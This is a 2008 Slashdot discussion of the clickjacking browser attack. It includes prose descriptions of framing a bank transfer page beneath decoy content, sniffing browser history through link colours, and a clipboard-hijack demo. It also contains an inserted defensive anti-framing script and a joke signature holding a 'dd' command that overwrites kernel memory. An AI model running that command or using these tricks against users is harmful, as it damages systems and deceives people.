      Probably just some asshole trying to make some word popular so later when the people they're trying to impress say it in conversation, they can go "Yeah?! Clickjacking! Did you know I came up with that word!?"

      --
      "Most people, I think, don't even know what a rootkit is, so why should they care about it?"
    3. Re:Summary wrong by jesser · · Score: 5, Informative

      The zdnet article is pretty vague, but I think it refers to the problem detailed in this message from Michal Zalewski:

      "A malicious page in domain A may create an IFRAME pointing to an application in domain B, to which the user is currently authenticated with cookies. The top-level page may then cover portions of the IFRAME with other visual elements to seamlessly hide everything but a single UI button in domain B, such as 'delete all items', 'click to add Bob as a friend', etc. It may then provide own, misleading UI that implies that the button serves a different purpose and is a part of site A, inviting the user to click it."

      Disabling JavaScript won't prevent the attack. It will break some mitigations, though!

      --
      The shareholder is always right.
    4. Re:Summary wrong by kesuki · · Score: 5, Informative

      the problem is actually in dhtml, but javascript makes the exploit 'much easier'

      hence, the attack sites will all be using javascript, because it's easier than writing it entirely in dhtml just to score an extra 1 click from the guy who disabled javascript because he doesn't trust it.

      BTW: in theory even sites like slashdot can be infected because the attack applies to all CSS coded sites. nice.

      oh, BTW, if you have noscript installed, this vulnerability can only force clicks within the same domain, since cross site code is automatically disabled.. AFAIK the only way to disable CSS is to use obsolete browsers like lynx.

    5. Re:Summary wrong by Free+the+Cowards · · Score: 3, Informative

      I thought "DHTML" was just a term for manipulating the DOM on the fly using JavaScript. How do you do DHTML without JavaScript?

      --
      If you mod me Overrated, you are admitting that you have no penis.
    6. Re:Summary wrong by Anonymous Coward · · Score: 0

      .... so I'm calling bullshit....

      I'm calling shenanigans!

    7. Re:Summary wrong by jesser · · Score: 5, Interesting

      FWIW, this isn't exactly a new idea. roc and I discussed it back in 2002.

      I'm glad it's getting attention now, though. Any fix is likely to require changes to specs.

      --
      The shareholder is always right.
    8. Re:Summary wrong by Anonymous Coward · · Score: 0

      Well CSS has events as well

    9. Re:Summary wrong by sootman · · Score: 4, Informative

      +1 for "vague and self-contradictory."

      From TFA: "The issue has nothing to do with JavaScript so turning JavaScript off in your browser will not help you." and then "The exploit requires DHTML." As far as I know, DHTML requires a client-side scripting language--the most popular of which (only?) is JavaScript.

      --
      Dear Slashdot: next time you want to mess with the site, add a rich-text editor for comments.
    10. Re:Summary wrong by HTH+NE1 · · Score: 4, Insightful

      Try the CSS pseudoclass :active to move things around, like make a facade image positioned to cover a real button disappear with display: none;.

      --
      Oh, say does that Star-Spangled Banner entwine / The myrtle of Venus with Bacchus's vine?
    11. Re:Summary wrong by hvm2hvm · · Score: 2, Informative

      If that's the case, then all you have to do is look at the address bar and see if you really are on the site you are seeing. If you click on a link and find yourself looking at your page on a social network while the address says "spam.dyndns.com" you should realize something is wrong.

      --
      ics
    12. Re:Summary wrong by Free+the+Cowards · · Score: 1

      Makes sense, thank you for explaining that.

      --
      If you mod me Overrated, you are admitting that you have no penis.
    13. Re:Summary wrong by HTH+NE1 · · Score: 5, Insightful

      Try the CSS pseudoclass :active

      And here is an example.

      --
      Oh, say does that Star-Spangled Banner entwine / The myrtle of Venus with Bacchus's vine?
    14. Re:Summary wrong by HTH+NE1 · · Score: 1

      I've wanted to know when an iframe is embedded in my page and where it comes from so I can evaluate whether I can trust it, especially since my credit card company's website decided to embed the login form inside such an iframe. Further, if I attempt to Show Only This Frame on the iframe, the site redirects me to an error page.

      Putting iframe[src]:before { content: attr(src); } in my userContent.css has not worked, though a[name]:before { content: "[#] "; } a[name]:active:before { content: "[#" attr(name) "] "; } does work to advertise named anchors (except where idiot web designers wrap link text in a named anchor causing it to shift away when clicked).

      --
      Oh, say does that Star-Spangled Banner entwine / The myrtle of Venus with Bacchus's vine?
    15. Re:Summary wrong by kesuki · · Score: 1

      and what do you do when it's a highly page ranked, 'google' shopping store, that is actually a phishing site on a 'build an estore site' that transfers your data to a legitimate store and simultaneously harvests your cc data to sell on the black market?

      hrm smarty pants what do you do then. happened to me, buying a cell phone data cable on the internet instead of in store where they charge triple the value of a data transfer cable...

      those 'build an estore' sites all look like legit domains... and on the surface google shopping can't tell the difference between a 'real' store and a 'phishing' store... and hackers know how to page rank spam, with free porn sites.

    16. Re:Summary wrong by brunascle · · Score: 1

      But by that time, the damage is done. Suppose the link you clicked was a "Delete my account" button, for example. Also, the parent window should still be covering most of the iframe, so the only part of the site you'd see is the small box where the link was.

    17. Re:Summary wrong by Kompressor · · Score: 1

      So then what if someone combines it with one of the phishing tactics that present "western" characters from an Asian character set in the address bar?

      The address bar will still read correctly, but the values of the letters you see would be completely different from where you actually were.

      Or am I way off base?

      --
      kmem russian roulette: Aquillar> dd if=/dev/urandom of=/dev/kmem bs=1 count=1 seek=$RANDOM
    18. Re:Summary wrong by Free+the+Cowards · · Score: 2, Informative

      What you do is you see an unknown charge on your credit card, call the company, cancel the card, and get a new one. Total cost to you: 15 minutes and zero dollars.

      Honestly, why are people so afraid of having their credit card numbers stolen? Unless you're utterly negligent and don't report fraudulent purchases, you have no liability!

      --
      If you mod me Overrated, you are admitting that you have no penis.
    19. Re:Summary wrong by anotherone · · Score: 2, Informative

      Actually under certain circumstances you could be liable for up to $50, but yeah usually it's not a big deal.

      --
      Username taken, please choose another one.
    20. Re:Summary wrong by kesuki · · Score: 1

      actually, i have capital one, so when a charge for $1.43 cents showed up they called me. but, it seemed like a valid little estore, i got my merchandise, they e-mailed me a tracking number.. nothing suspicious except that my card then was sold on the black market.

      and remember, there are a lot of people who use debit cards, debit cards directly charge a bank account, and you don't have protection. some people chose not to get credit cards, or simply can't get credit cards.

      even if i'm not liable for the fraud, there is still someone making money off my stolen credit card, and everyone who gets credit cards stolen costs the global economy billions of dollars a year.

      and imagine, if they had designed a site to steal my whole identity and not just my credit card... i would have been suspicious, because i've used online stores before... but how many people would stupidly enter their social security number at an online store if it asked for it and required it?

    21. Re:Summary wrong by Anonymous Coward · · Score: 0

      AFAIK the only way to disable CSS is to use obsolete browsers like lynx.

      I'm usually using control + shift + s with the firefox developer toolbar extension.

    22. Re:Summary wrong by Free+the+Cowards · · Score: 2, Informative

      I'm pretty sure that's only if your actual signature is on a receipt somewhere, which is fairly difficult to arrange when your number gets stolen over the internet.

      --
      If you mod me Overrated, you are admitting that you have no penis.
    23. Re:Summary wrong by Free+the+Cowards · · Score: 1

      Having your number "sold on the black market" is irrelevant. Either your number was used fraudulently or it wasn't. If it was, you get it replaced. If it wasn't, nothing bad happened.

      I'm pretty sure that you have the same protections on debit cards as on credit cards. It's more difficult because the money in your bank account goes away, but you do get it back on fraudulent charges.

      However, it's bad to have the money leave in the first place and it moves power from me to the card company, so this is why I never use debit cards.

      Stolen cards may cost the global economy but that's hardly a reason for me to get deeply upset when mine get stolen. The card companies generally have good anti-fraud measures and when they don't my personal cost is very low. It's reasonable to take basic safeguards against having the number stolen but there's no reason to get upset about the possibility.

      --
      If you mod me Overrated, you are admitting that you have no penis.
    24. Re:Summary wrong by bluej100 · · Score: 1

      The point is that you aren't seeing the trusted site, aside from one input element. It sounds like the attack is basically opening an iframe to "http://mybank.example/transfer?to=haxors&amount=99999" and covering everything other than the "Confirm" button with "Click okay to win a FREE XBox 360!"

      If I'm predicting the attack correctly, effective protection is either 1) using different browsers for trusted and untrusted sites or 2) only being logged into one site at a time. (Key phrase: to which the user is currently authenticated with cookies.)

      I suppose, though, that as an extension of this attack, they could perhaps present the login form for another site as a registration form and hope to catch people using the same credentials for everything.
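Added example, not code from the thread or from any poster: the check a framed page can make before showing the kind of control Zalewski's message above describes ("delete all items") and bluej100's "Confirm" scenario. The function names, the `data-sensitive` attribute and the origins `bank.example` / `evil.example` are assumed for illustration; `window.location.ancestorOrigins` is a real property but exists only in WebKit/Blink browsers, so a page that cannot enumerate its ancestors is treated as hostile rather than trusted.

```javascript
// Added example, not from the thread: defensive framing checks for a page
// that hosts a sensitive button. The policy is a pure function so it can be
// tested outside a browser; the probe reads window globals and only means
// something inside one.

// Decide whether sensitive UI may be shown.
//   facts.framed          - true when the document is inside an iframe
//   facts.ancestorOrigins - array of ancestor origins, or null when unknown
//   allowedAncestors      - origins permitted to frame this page (assumed list)
function framingDecision(facts, allowedAncestors) {
  if (!facts.framed) {
    return { render: true, reason: 'top-level document' };
  }
  if (!Array.isArray(facts.ancestorOrigins)) {
    // A parent we cannot inspect is exactly the cross-domain IFRAME case
    // quoted from Zalewski above: refuse to render rather than guess.
    return { render: false, reason: 'framed by an unknown origin' };
  }
  const rogue = facts.ancestorOrigins.find(
    (origin) => !allowedAncestors.includes(origin)
  );
  if (rogue !== undefined) {
    return { render: false, reason: 'framed by ' + rogue };
  }
  return { render: true, reason: 'every ancestor is allow-listed' };
}

// Gather the facts from a window object. location.ancestorOrigins is a real
// WebKit/Blink property; where it is absent we report null (unknown).
function collectFramingFacts(win) {
  const framed = win.top !== win.self;
  let ancestorOrigins = null;
  const list = win.location && win.location.ancestorOrigins;
  if (list && typeof list.length === 'number') {
    ancestorOrigins = Array.from(list);
  }
  return { framed: framed, ancestorOrigins: ancestorOrigins };
}

// Apply the decision to a document: hide every element marked data-sensitive
// (assumed marker) and append a notice. Returns the number of elements hidden.
function applyFramingDecision(doc, decision) {
  const targets = doc.querySelectorAll('[data-sensitive]');
  let hidden = 0;
  targets.forEach((el) => {
    el.style.display = decision.render ? '' : 'none';
    if (!decision.render) hidden += 1;
  });
  if (!decision.render) {
    const notice = doc.createElement('p');
    notice.textContent = 'This page was loaded inside another site (' +
      decision.reason + '); actions are disabled.';
    doc.body.appendChild(notice);
  }
  return hidden;
}

// Browser entry point; skipped when run outside a browser. The allow-list is
// a constructed placeholder: a real deployment lists its own origin and any
// trusted embedders.
if (typeof window !== 'undefined' && typeof document !== 'undefined') {
  const decision = framingDecision(
    collectFramingFacts(window),
    ['https://bank.example']
  );
  applyFramingDecision(document, decision);
}
```

This is a client-side check only: as jesser notes above, turning scripting off does not stop the attack but does disable mitigations like this one, so it complements a server-sent framing policy (the X-Frame-Options response header that browsers adopted after this discussion) rather than replacing it.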

    25. Re:Summary wrong by geekmux · · Score: 1

      In the meantime, the only fix is to disable browser scripting and plugins...

      Wow, is that all? Whew, that's a relief. For a minute there I thought you were going to tell me I had to cripple functionality for 90% of Internet sites or something craz...er, aaahhh...oh. Never mind.

    26. Re:Summary wrong by Pulzar · · Score: 1

      and remember, there are a lot of people who use debit cards, debit cards directly charge a bank account, and you don't have protection.

      What bank are you with? My debit card was somehow duplicated (since I never lost mine, it was still in my wallet) and used to withdraw money in another city, far away from me. My bank canceled my debit card, gave me a new one, and gave me the money back. It was pretty much the same experience as when my credit card number was stolen.

      --
      Never underestimate the bandwidth of a 747 filled with CD-ROMs.
    27. Re:Summary wrong by brasscount · · Score: 1

      Amen. Insecure coding practices from banks (credit card providers, etc.) are the leading issue in browser security, IMO. If a security fix (like disable displaying different domains in multiple frames) breaks banking, then the setting gets turned off. It's part of FISMA and FDCC but no one can actually implement it, because too many app developers want to let you look at a couple of different sites at one time, rather than screen scraping and redisplaying to save on overhead.

      --
      Confidentiality, Integrity, Availability: without Availability the other two are assured, as is Bankruptcy.
    28. Re:Summary wrong by bbdd · · Score: 1

      A follow-up from Giorgio Maone, the creator of NoScript says:

      "1. It's really scary.

      2. NoScript in its default configuration can defeat most of the possible attack scenarios (i.e. the most practical, effective and dangerous) - see this comment by Jeremiah Grossman himself.

      3. For 100% protection by NoScript, you need to check the "Plugins | Forbid " option."

      Read it here:

      http://blogs.zdnet.com/security/?p=1973

    29. Re:Summary wrong by Anonymous Coward · · Score: 0

      Yet another reason to know who you are giving your credit card number to. Finding a store via a Google search, doing no other investigation of that store (i.e. determining whether the people working there are trustworthy, whether you have the right internet address, etc.), and handing your credit card number over to them is just asking for trouble.

    30. Re:Summary wrong by Anonymous Coward · · Score: 0

      It does not work if JavaScript is disabled. I do not use the latest flash player, but with disabled JavaScript it did not even try to load swflash.cab or test.swf, or if it did download it never activated.

    31. Re:Summary wrong by ConceptJunkie · · Score: 1

      Why `Free as in Beer'? Because TANSTAAFL.

      What if you make a lunch out of free beer?

      --
      You are in a maze of twisty little passages, all alike.
    32. Re:Summary wrong by Anonymous Coward · · Score: 0

      Or use Firefox Web Developer Toolbar - Ctrl+Shift+L disables all CSS.

    33. Re:Summary wrong by White+Shade · · Score: 3, Insightful

      That's true, but the big problem is that the debit card money comes out of your account immediately.... even if you do get it all back, there is the possibility for this to happen:

      1- you check your bank balance in the morning
      2- you make a string of purchases, knowing that you're safe in your balance

      hidden step 1.5 - someone illegitimately uses your bank card and zeros you out.
      hidden step 3 - every purchase you made hits you for a $20-40 overdraft charge, which you may or may not get back, and even if you do get it back, it takes a finite amount of time, during which every other transaction that may not have posted yet ALSO hits you for overdraft, and you can't use your card, and have no money.

      It's a really awkward and annoying situation to be in, for sure.

      --
      ìì!
    34. Re:Summary wrong by kesuki · · Score: 1

      slashcode ate your [iframe] paste because it used '>' carets.

      iframe is not blocked by default. so noscript does not block this by default if a determined hacker is targeting noscript users.

    35. Re:Summary wrong by Tangent128 · · Score: 1

      Some are suggesting to simply disable UI interaction with an iframe while it's covered; half a second after the iframe is clear, it can be clicked again. And same-origin frames will probably not be so limited, so you should be fine.

    36. Re:Summary wrong by Pulzar · · Score: 1

      Ok, but that's different from "bank cards have no protection". Yeah, it's more inconvenient than a credit card being stolen, but you do get your money back. And, while you're waiting for the money to be returned, use your credit card :).

      --
      Never underestimate the bandwidth of a 747 filled with CD-ROMs.
    37. Re:Summary wrong by Anonymous Coward · · Score: 0

      Sure with that same domain thing? Think this will result in a "Disable CSS" feature request for noscript.. Who needs lynx to scare away web20 developers :P

    38. Re:Summary wrong by Anonymous Coward · · Score: 0

      But the article says it uses DHTML and your exploit doesn't. Then again, according to the article it must be some unheard-of kind of DHTML that works without Javascript.

    39. Re:Summary wrong by zarkill · · Score: 1

      as other people have mentioned, the firefox web developer toolbar offers a lot of CSS control, but if you don't want to install that and still want to disable all CSS, you can add a "*.css" filter to adblock. it's kludgey, but it will do the job.

    40. Re:Summary wrong by jonadab · · Score: 1

      > As far as I know, DHTML requires a client-side scripting language

      My understanding has always been that DHTML *is* HTML with client-side scripting, by definition.

      Well, okay, I suppose these days you could make a web page somewhat dynamic with CSS (using things like :hover), but at the time the term "DHTML" was coined that wasn't possible, so I'm not sure if it counts as DHTML.

      > the most popular of which (only?) is JavaScript.

      Javascript is the most common name for the only one that's even vaguely popular, which is also the only one implemented in more than one browser[1]. I'm not sure whether it's the only one enabled by default in a major browser, since I'm not sure at this point whether IE has VBScript enabled by default out of the box. (I mainly just use IE to test my own websites for IE compatibility, so I haven't kept up on all of its non-standard features.)

      [1] Technically, the word "browser" here should probably be some more complicated term or phrase, along the lines of "vendor's browser framework" or whatnot, to account for the fact that the bulk of IE can be rebranded and/or embedded in a different UI to make things like MSN Explorer and Maxthon.

      --
      Cut that out, or I will ship you to Norilsk in a box.
    41. Re:Summary wrong by Anonymous Coward · · Score: 0

      Who or what is "roc"?

    42. Re:Summary wrong by Anonymous Coward · · Score: 0

      mmm Guinness.

    43. Re:Summary wrong by Anonymous Coward · · Score: 0

      It was also done in Phishing Exposed in '05. It's basically a CSRF (Cross-Site Request Forgery). In Phishing Exposed, the example added a book to a victim's wishlist.

    44. Re:Summary wrong by ConceptJunkie · · Score: 1

      Guinness. It's good for you.

      --
      You are in a maze of twisty little passages, all alike.
  10. Thank Jeebus! by Anonymous Coward · · Score: 5, Funny

    Finally I have a legitimate excuse for all the pr0n sites that are in my browser history. No honey, it isn't me, it's a browsers exploit! I swear!

    1. Re:Thank Jeebus! by Roberticus · · Score: 5, Funny

      Finally I have a legitimate excuse for all the pr0n sites that are in my browser history. No honey, it isn't me, it's a browsers exploit! I swear!

      I don't know how things work for you, but saying that I just got clickjacked is only going to get me into more trouble, not less.

  11. Bullshit? by sakdoctor · · Score: 4, Insightful

    I don't think this exploit really exists. A cross browser cross platform exploit that doesn't use javascript?
    Won't be losing any sleep over this one.

    1. Re:Bullshit? by Anonymous Coward · · Score: 1, Informative

      Adobe was mentioned in TFA, no specific details were given but I'd guess that flash is implicated.

    2. Re:Bullshit? by id · · Score: 5, Insightful

      Except you're wrong, but don't take my word for it (I run ha.ckers.org with RSnake), see what Adobe has to say.

      http://blogs.adobe.com/psirt/2008/09/thanks_to_jeremiah_grossman_an.html

      -id

    3. Re:Bullshit? by Spy+der+Mann · · Score: 1

      God bless Flashblock!

    4. Re:Bullshit? by Anonymous Coward · · Score: 1, Funny

      Don't trust that link!

    5. Re:Bullshit? by lgw · · Score: 1

      I don't think this exploit really exists. A cross browser cross platform exploit that doesn't use javascript?

      Ahh, the old "I don't understand it so it must be unimportant" fallacy. Now I know my boss's Slashdot ID!

      The exploit targets the human more than some code defect. It's just drawing a fake web page over the real one to disguise what button you're really clicking. This can be done with just CSS, though it's much easier with Javascript.

      --
      Socialism: a lie told by totalitarians and believed by fools.
    6. Re:Bullshit? by awol · · Score: 2, Informative

      I too was initially tempted to call bullshit but it seems that (http://lists.whatwg.org/pipermail/whatwg-whatwg.org/2008-September/016284.html) it's the real deal. Worrying but not something over which to lose too much sleep, yet!, since finding the exploit is the problem.

      --
      "The first thing to do when you find yourself in a hole is stop digging."
    7. Re:Bullshit? by Anonymous Coward · · Score: 0

      like i'd click on that link.

    8. Re:Bullshit? by dolmen.fr · · Score: 1

      The issue is probably that the browser is giving too many rights to the Flash plugin.
      Maybe it is possible to intercept browser events from a Flash object and change them (for example, change the mouse coordinates) before they reach the page event handler.

  12. Konqueror? by Anonymous Coward · · Score: 0

    Anybody know if/how Konqueror is affected by this??

    1. Re:Konqueror? by eln · · Score: 4, Funny

      The summary clearly states that only lynx is not affected. It's pretty obvious what's going on here: the exploit is a nefarious plot to make everyone switch over to lynx, thereby crippling the non-text-based porn industry.

    2. Re:Konqueror? by moderatorrater · · Score: 4, Funny

      I knew that sticking with ASCII porn would pay off someday.

    3. Re:Konqueror? by bishiraver · · Score: 1

      Finally! My stock in B(. )( .)bs Inc. will be worth more than the paper the shares are printed on!

    4. Re:Konqueror? by mpeg4codec · · Score: 1

      It's all a huge ploy by the guys at asciipr0n.com!

    5. Re:Konqueror? by Anonymous Coward · · Score: 1, Funny

      "sticking"

      TMI

    6. Re:Konqueror? by Anonymous Coward · · Score: 0

      Are there even any non-text-based porn companies still around??? How do they make money??

  13. Premature claim by clang_jangle · · Score: 4, Interesting

    scary new browser exploit/threat affecting all the major desktop platforms

    I didn't find that information in TFA or in any of the TFAs linked in TFA (here here here here). Though it may be so; it sounds like this exploit makes use of the browser's access to the clipboard.
    Elinks FTW!

    --
    Caveat Utilitor
    1. Re:Premature claim by kesuki · · Score: 1

      actually, i wiki'ed Dhtml and that is where you get the 'cross browser' information http://en.wikipedia.org/wiki/Dynamic_HTML

      seems like it's a fundamental flaw in CSS files, after adding noscript https://addons.mozilla.org/addon/722 to firefox add cssviewer https://addons.mozilla.org/en-US/firefox/addon/2104

      this allows you to find in the css the code that causes the clicking, and FWIW javascript does make the exploit massively easier, but is not needed, all one needs is to design a css file that does the desired clicks in a 0 pixel frame, and attach it to a nice little dancing pig flash game that people will forward to all their friends.

  14. Seems like another buzzword by robinsonne · · Score: 2, Insightful

    From reading TFA (I know, silly me) this seems to be pretty much fear-mongering with a fancy new buzzword. "Clickjacking" oooo scary!

    Until some real technical details come up I'd say nothing to see here, move along.

    1. Re:Seems like another buzzword by Anonymous Coward · · Score: 0

      Since it's claimed to affect any major browser, who would benefit from this fear-mongering then?

  15. OWASP by Lord+Ender · · Score: 4, Interesting

    was to be discussed at the OWASP conference but was nixed at the last minute at the request of affected vendors

    Well, add OWASP to the list of security organizations with no integrity. It's clear they care about their sponsors, not their members.

    --
    A slashdotter who didn't build his own computer is like a Jedi who didn't build his own lightsaber.
    1. Re:OWASP by Anonymous Coward · · Score: 0

      It appears that the speakers pulled the presentation themselves, not the conference (http://blogs.adobe.com/psirt/2008/09/thanks_to_jeremiah_grossman_an.html)

    2. Re:OWASP by Anonymous Coward · · Score: 1, Informative

      So, after much deliberation we opted to pull our speech voluntarily, due to the extremely neutered information we'd have to be sharing. We'd much rather share the full breadth of what we found when it can be discussed more openly as to not diminish the danger of the flaw by only talking about small parts of the issue. There will still be holes in many websites due to this problem even after the short term patches are available, but we'd rather a few of the more critical problems get patched before we go public.

      However, I must stress, this is not an evil "the man is trying to keep us hackers down" situation, a la Michael Lynn vs. Cisco, or Chris Paget vs. HID, or MIT vs. MBTA and so on. We proactively decided it was better to pull the speech ourselves for the time being and for anyone who was looking forward to the speech all I can say is I hope to make it up to you once the vendors are in a better spot. It wasn't an easy decision but it really feels like the best option we have given the current situation. If you're desperate for a way to patch your browser from the issue disable scripting and plugins for the time being. More to come.

      Taken from http://ha.ckers.org/blog/20080915/clickjacking/

    3. Re:OWASP by Lord+Ender · · Score: 1

      Ah, OK. I withdraw my criticism of OWASP as the cancellation seems not to be their fault. Apologies, guys.

      --
      A slashdotter who didn't build his own computer is like a Jedi who didn't build his own lightsaber.
    4. Re:OWASP by skis · · Score: 2, Informative

      Actually, the presenters were the ones that made that decision.

      So, after much deliberation we opted to pull our speech voluntarily, due to the extremely neutered information we'd have to be sharing. We'd much rather share the full breadth of what we found when it can be discussed more openly as to not diminish the danger of the flaw by only talking about small parts of the issue.
      -from ha.ckers.org

    5. Re:OWASP by Anonymous Coward · · Score: 0

      Said the ueberleet sysadmin who would like to have every single detail of the exploit known so that he may patch or mitigate the issue on the machines he administrates before the handful of people who -may- currently know about this can get to his machines in a fully targeted and surreptitious attack; concluding "sucks to be you" the following day to all the non-ueberleet sysadmin common people when they get pwnd by dozens of scriptkiddies and less methodical ne'er-do-wells after aforementioned exploit detailage made it readily possible for everybody and their dog to use it.

    6. Re:OWASP by Lord+Ender · · Score: 1

      I'm an IT security penetration tester, not a sysadmin. And I want all the details of all known security vulnerabilities. Anything less puts me at a disadvantage to those who do have full details.

      And with the advent of organized crime into the hacking scene, you just can't assume white-hat researchers are the only ones discovering these vulnerabilities.

      --
      A slashdotter who didn't build his own computer is like a Jedi who didn't build his own lightsaber.
    7. Re:OWASP by HTH+NE1 · · Score: 0, Offtopic

      McCoy: I don't have a solution. But furnishing them with firearms is certainly not the answer!
      Kirk: Bones, do you remember the twentieth-century brush wars on the Asian continent? Two giant powers involved, much like the Klingons and ourselves. Neither side felt that they could pull out?
      McCoy: Yes, I remember -- it went on bloody year after bloody year!
      Kirk: But what would you have suggested? That one side arm its friends with an overpowering weapon? Mankind would never have lived to travel space if they had. No -- the only solution is what happened, back then: a balance of power.
      McCoy: And if the Klingons give their side even more?
      Kirk: Then we arm our side with exactly that much more. A balance of power -- the trickiest, most difficult, dirtiest game of them all -- but the only one that preserves both sides!

      --
      Oh, say does that Star-Spangled Banner entwine / The myrtle of Venus with Bacchus's vine?
  16. Short on explanations by stuntpope · · Score: 1

    FTA: "The issue has nothing to do with JavaScript...", "Javascript is not required to exploit this....", "The exploit requires DHTML." Anyone care to educate me on these seemingly contradictory statements? (and yes, I know DHTML could utilize a different, non-JS scripting language). What else is DHTML but HTML, scripts that run in the browser's scripting engine, and CSS?

    1. Re:Short on explanations by ray-auch · · Score: 1

      Not contradictory at all. The D in DHTML is for dynamic, not scripting. Plenty of dynamic things you can do with CSS alone, such as display (or not), hide/unhide etc. - and dynamic based on user actions (:active :hover :focus).

  17. How does it work? by Anonymous Coward · · Score: 0

    So how does it work now?

    Lynx is safe, but all others are not. But disabling Javascript doesn't help?
    Then there is
    "In the meantime, the only fix is to disable browser scripting and plugins"
    So what exactly does "browser scripting" mean, if not Javascript?

  18. didn't click by big+whiffer · · Score: 4, Funny

    i didn't even click on this story; someone must want me to read this...

  19. One of these things is not like the other. by Tackhead · · Score: 5, Insightful

    Microsoft Internet Explorer, Mozilla Firefox, Apple Safari, Opera and Adobe Flash.

    Web browser, Web browser, Web browser, Web browser, and cross-platform method for running code delivered from untrusted sources.

    From TFA:

    "The threat, called Clickjacking, was to be discussed at the OWASP NYC AppSec 2008 Conference but, at the request of Adobe and other affected vendors, the talk was nixed until a comprehensive fix is ready."

    One vendor is, unlike the others, mentioned by name. It happens to be the vendor that ships The One Thing That Is Not Like The Others.

    Also from TFA:

    "According to someone who attended the semi-restricted OWASP presentation, the issue is indeed zero-day, affects all the different browsers and has nothing to do with JavaScript:"

    and

    "In the meantime, the only fix is to disable browser scripting and plugins. We realize this doesn't give people much technical detail to go on, but it's the best we can do right now."

    Now we're at a quandary. Your humble correspondent is at a loss to even speculate as to the nature of a technology that Ffirstly isn't Javashit, but which can conceivably be invoked by web content regardless of which web browser is in use, but lastly can be secured against by disabling hated plug-ins.

    1. Re:One of these things is not like the other. by melikamp · · Score: 1

      Mod it up, boys.

    2. Re:One of these things is not like the other. by Chysn · · Score: 5, Interesting

      > Now we're at a quandary. Your humble
      > correspondent is at a loss to even speculate as
      > to the nature of a technology that Ffirstly isn't
      > Javashit, but which can conceivably be invoked by
      > web content regardless of which web browser is in
      > use, but lastly can be secured against by
      > disabling hated plug-ins.

      It's a Flash exploit. I found a proof-of-concept by clicking around TFA, and it promised that the Flash movie would take over my clipboard, forcing me to close the browser window. I'm on Firefox 3.0.2, and the "proof-of-concept" did nothing.

      At least nothing obvious. I suppose I could have been rootkitted.

      --
      --I'm so big, my sig has its own sig.
      -- See?
    3. Re:One of these things is not like the other. by Anonymous Coward · · Score: 0

      Bravo. I'd mod your post up if I could.

    4. Re:One of these things is not like the other. by X0563511 · · Score: 0, Troll

      Hmm, and hot on the heels of a few other security vulnerabilities.

      I'm really hoping crackers exploit the hell out of flash until it's ground underfoot. If we try to do the nice thing, and suggest/recommend PROPER ways of using Flash, and the only thing we get is a resounding 'fuck you,' I think screwing flash over is called-for.

      It's a shame Adobe doesn't put something in their toolkit EULAs about proper use of Flash.

      --
      For large sets, this will be our guide even unto death, for the LORD will work for each type of data it is applied to...
    5. Re:One of these things is not like the other. by stuntpope · · Score: 1

      Oh, do you think so?

      (sorry ;)

      Firstly lastly hated plug-ins.

    6. Re:One of these things is not like the other. by jefu · · Score: 1

      proper use of Flash

      I suspect that Adobe feels that any and all use of Flash is proper use, as do many designers who don't want to cope with HTML and javascript, marketers (who can enforce your watching their videos/animations/...), and lots of others who paid someone to build flash and want their money's worth.

      But then I'm a Cranky Old Fart - so get off my browser/lawn.

    7. Re:One of these things is not like the other. by Anonymous Coward · · Score: 0

      Did you even try pasting from your clipboard?

    8. Re:One of these things is not like the other. by edalytical · · Score: 1

      It's a shame Adobe doesn't put something in their toolkit EULAs about proper use of Flash.

      You mean like this?

      ADOBE
      Adobe Flash
      Software License Agreement
      [...]
      9 and 3/4. Proper Use.

      When used, you may only use the Software to create homestarrunner.com. You may not use the Software in any way to create any other content whatsoever. You shall be solely responsible to your end users for any hate, threats on your life, or other liability which may arise from the end users' access to the content that is not homestarrunner.com. Failure to follow the proper use clause may be hazardous to your health and well-being; in extreme cases this could be fatal. Other penalties may include permanent ejection from the 1nt3rw3bz. You have been warned!

      --
      Win a signed Stephen Carpenter ESP Guitar from the Deftones: http://def-tag.com/?r=0008781
    9. Re:One of these things is not like the other. by stevied · · Score: 1

      I'm not sure the clipboard hijacking is anything to do with this new 'clickjacking' issue - it came up about a month ago, I'm fairly sure it was on slashdot at the time.

      I'm really not sure what that link ("SEE: Adobe Flash ads launching clipboard hijack attack") is doing in the middle of the ZDNet post.

    10. Re:One of these things is not like the other. by textstring · · Score: 1

      you did notice that flash exploit they link to is from a month ago?

    11. Re:One of these things is not like the other. by Anonymous Coward · · Score: 1, Informative

      I followed TFA and sure enough, after loading the demo ( http://raffon.net/research/flash/cb/test.html ), I found http://www.evil.com in my clipboard.
      Woohoo! Give it a try, it's fun!

    12. Re:One of these things is not like the other. by Chysn · · Score: 1

      > Did you even try pasting from your clipboard?

      Yes. There was nothing in my clipboard. But the exploit isn't just supposed to put something in my clipboard; it's supposed to force me to "click" on something.

      --
      --I'm so big, my sig has its own sig.
      -- See?
    13. Re:One of these things is not like the other. by Anonymous Coward · · Score: 0

      Yeah, the exploit does work, even on Firefox/Linux. It's not persistent in the clipboard though and easily overwritten just by selecting something else. The permanent clipboard hijack must be a benefit of running Windows.

      I run FlashBlock and Adblock Plus so I probably don't see any of these compromised Flash ad thingies anyway.

    14. Re:One of these things is not like the other. by Onaga · · Score: 1

      At least nothing obvious. I suppose I could have been rootkitted.

      I tried it, too, but didn't notic

      hahah... im a n00b

      wtf? what's going on with my ke

      penis

  20. I was clickjacked by Anonymous Coward · · Score: 1, Insightful

    There was this slashdot article here.

    Turns out some hacker clickjacked the link, replacing it with a useless link with no detail or value added. It is getting more and more common on slashdot.

  21. The fix is ... by Anonymous Coward · · Score: 0

    p0rn mode

  22. Using CSS + JS To Find Visited Links by WebmasterNeal · · Score: 0

    This could be totally unrelated to this exploit but I devised a way to do something like this in the past where I'd use javascript to check whether a link on a page has been visited by the user or not based on what color it was. Given a huge list of websites, you could weed out what sites a user has visited and what sites they haven't by dynamically adding them to the page, then looping through the links using javascript. It could then potentially be written to a log file with the user's IP.

    --
    "During My Service In The United States Congress, I Took The Initiative In Creating The Internet." -Al Gore
  23. But does it affect the links browser? by rwa2 · · Score: 2, Interesting

    Using the links browser in a terminal with mouse support is almost exactly like using a browser with images turned off...

    Witness:
    http://www.jikos.cz/~mikulas/links/screenshots/png.html

    1. Re:But does it affect the links browser? by Anonymous Coward · · Score: 0

      1) it affects flash, so no, links is not affected
      2) links is not like using a normal browser, monospace color characters cannot do correct formatting. Although, for a terminal browser, links is fairly impressive
      3) I don't know how well linking to some tiny server with a page full of photos on slashdot will turn out

    2. Re:But does it affect the links browser? by Anonymous Coward · · Score: 0

      Holy crap, links has come a long way since I last used it. Currently I'm using Firefox + Adblock Plus + NoScript = web browsing nirvana. I don't really frequent "Web 2.0" sites that much; I will have to give links another try.

